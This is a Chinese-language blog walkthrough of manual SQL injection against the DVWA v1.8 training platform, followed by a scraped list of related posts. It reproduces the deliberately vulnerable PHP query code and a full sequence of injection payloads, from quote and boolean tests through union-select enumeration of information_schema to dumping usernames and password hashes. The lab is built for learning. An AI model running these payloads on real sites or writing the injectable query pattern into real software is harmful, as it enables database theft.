2. 程式人生 > >DVWA平臺v1.8-SQL註入

DVWA平臺v1.8-SQL註入

阿新 發佈:2017-11-26
內容 res 單引號 src order 分享 i++ 技術分享 base

代碼

<?php     

if(isset($_GET[‘Submit‘])){ 
     
    // Retrieve data 
     
    $id = $_GET[‘id‘]; 

    $getid = "SELECT first_name, last_name FROM users WHERE user_id = ‘$id‘"; 
    $result = mysql_query($getid) or die(‘<pre>‘ . mysql_error() . ‘</pre>‘ ); 

    $num = mysql_numrows($result); 

    $i = 0; 

    while ($i < $num) { 

        $first = mysql_result($result,$i,"first_name"); 
        $last = mysql_result($result,$i,"last_name"); 
         
        echo ‘<pre>‘; 
        echo ‘ID: ‘ . $id . ‘<br>名字: ‘ . $first . ‘<br>姓氏: ‘ . $last; 
        echo ‘</pre>‘; 

        $i++; 
    } 
} 
?>

該代碼沒有對傳入的id進行檢測和過濾,且為字符型註入

技術分享圖片

提交1,搜索

技術分享圖片

提交單引號,報錯

技術分享圖片


提交1 and 1=1,查詢,返回正確

技術分享圖片

提交1 and 1=2,查詢,返回正確

技術分享圖片

提交1‘and ‘1‘ =‘1,查詢,返回正確

技術分享圖片

提交1‘and ‘1‘ =‘2,查詢,無返回

技術分享圖片

判斷為字符型註入

order by查詢字段數

1‘ order by 1#,返回正確

1‘ order by 2#,返回正確

1‘ order by 3#,返回錯誤

有兩個字段

爆字段

1‘ union select 1,2#

技術分享圖片

查詢一下數據庫版本和當前數據庫名

1‘ union select version(),database()#

技術分享圖片

數據庫版本為5.5.40,當前數據庫名為dvwa

查詢數據庫中的表

1‘ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

技術分享圖片

有guestbook和users兩個表

查詢users這個表

1‘ union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273#

註:table_name後面跟著是users的Hex值

技術分享圖片

對user和password的內容進行讀取

-1‘ union select user,password from users#

技術分享圖片

DVWA平臺v1.8-SQL註入

相關推薦

DVWA平臺v1.8-SQL

內容 res 單引號 src order 分享 i++ 技術分享 base 代碼 <?php if(isset($_GET[‘Submit‘])){ // Retrieve data $id = $_GET[‘

記一次dvwa sql爆庫

dvwasql註入 python安裝 sqlmap安裝及使用 一 前期準備1 sqlmap在windows環境下需要python2.7的支持,在python官網下載即可https://www.python.org/2 安裝python2.7,默認即可。安裝完成後需要配置下環境變量。右擊計算機-&g

ourphp 最新版(v1.7.3) 後臺sql

http dmi client app conf agen 9.png 系統 sql語句 version:<?php /*************************************************************************

SQL(dvwa環境)

esp dvwa 發現 bili .net resp 報錯 rom 字段 首先登錄DVWA主頁: 1、修改安全級別為LOW級(第一次玩別打臉),如圖中DVWA Security頁面中。 2、進入SQL Injection頁面,出錯了。(心裏想著這DVWA是官網下的不至於玩

DVWA篇之SQL

DVWA SQL註入 WEB SQL Injection本文需要的實驗環境及搭建請訪問:DVWA篇之環境搭建 SQL註入就是通過把sql語句插入到web表單提交或輸入頁面請求的查詢字符串,最終達到欺騙服務器執行惡意的SQL命令 Sql註入的一般流程: 1、判斷註入點2、判斷註入類型3、判斷數據庫類

《11招玩轉網絡安全》之第四招:low級別的DVWA SQL

password nta 下載 測試 gin isp 圖像 default 下一步 以DVWA為例,進行手工註入,幫助讀者了解註入原理和過程。 1、啟動docker,並在終端中執行命令: docker ps -a docker start LocalDVWA doc

c#配置問題以及簡單防止sql,連接池問題,sqldatareader對象對於connection對象的釋放

c#添加引用。system configurationconfigurationManager.AppSettings[“”]<appSetings><add key=“” value=“”></appSetings><connectionStrings><

SQL原理講解及防範

ant htm part 無效 快樂 日常 field users lib 原文地址:http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要 日前,國內最大的程序員社區CSDN網站

談談PHP網站的防SQL

效果 query 數據庫服務 data sqlite nbsp lds esc informix SQL(Structured Query Language)即結構化查詢語言。SQL 註入,就是把 SQL 命令插入到 Web 表單的輸入域或頁面請求參數的查詢字符串中,在 W

PDO防止SQL具體介紹

取代 能夠 article 數據庫 bsp 什麽 幫助 用戶 機會 <span style="font-size:18px;"><?php $dbh = new PDO("mysql:host=localhost; dbname=demo", "use

PHPCMS v9.6.0 wap模塊 SQL

sed injection update pytho see repl nbsp per pre 調試這個漏洞的時候踩了個坑,影響的版本是php5.4以後。 由於漏洞是由parse_str()函數引起的,但是這個函數在gpc開啟的時候(也就是php5.4以下)會對單引號進行

Joomla!3.7.0 Core SQL漏洞動態調試草稿

src cnblogs phpstorm prop ets legacy gets oom users 從這個頁面開始下斷點:Joomla_3.7.0/components/com_fields/controller.php 調用父類的構造

【EF框架】使用params參數傳值防止SQL報錯處理

collect oar mapping cnblogs ken datetime nbsp .com src 通過SqlParameter傳時間參數,代碼如下: var param = new List<SqlParamete

另一種的SQL和DNS結合的技巧

其中 where ets 鏈接 是我 例如 .com bar 導致 這個技巧有些另類,當時某業界大佬提點了一下。當時真的真的沒有理解到那種程度,現在可能也是沒有理解到,但是我會努力。 本文章是理解於:http://netsecurity.51cto.com/art/2015

SQL1

put com mysq secure name 字符 html mit rom <html> <head> Secure Web Login </head> <body> <?php if($_POST[user] &

mysql防SQL搜集

prepare case when sch pass 字符 ble 失敗 sqli 16進制 SQL註入 例:腳本邏輯 $sql = “SELECT * FROM user WHERE userid = $_GET[userid] “; 案例1:SELECT * F

Python防止sql

pan lec posit printf osi sqli jet usr operation 看了網上文章,說的都挺好的,給cursor.execute傳遞格式串和參數,就能防止註入,但是我寫了代碼,卻死活跑不通,懷疑自己用了一個假的python 最後,發現原因可能是

SQL之SQLmap入門

訪問控制 ret 當前 輸入 手動 ati 取數據 shc 3.2 http://www.freebuf.com/articles/web/29942.html 簡介 許多現實中對於網站的攻擊往往是由於網站沒有及時更新或者對於用戶的輸入沒有進行檢查。從緩沖區溢出

防止sql的函數addslashes()

php null str ges 定義 echo pre 註入 之前 1 <?php 2 $str = addslashes(‘Shanghai is the "biggest" city in China.‘); 3 echo($str); 4 ?> 定義

sqltips

註釋 ctf log 攔截 技術分享 執行 框架 哪裏 師傅 轉自http://www.wupco.cn/?p=3764 cuit 首先Web300 山水集團 第一步找到加密接口搭代理就不說了 接下來是註入,filter如下 這裏主要的難點在於如何按字節拆解返回的值,以完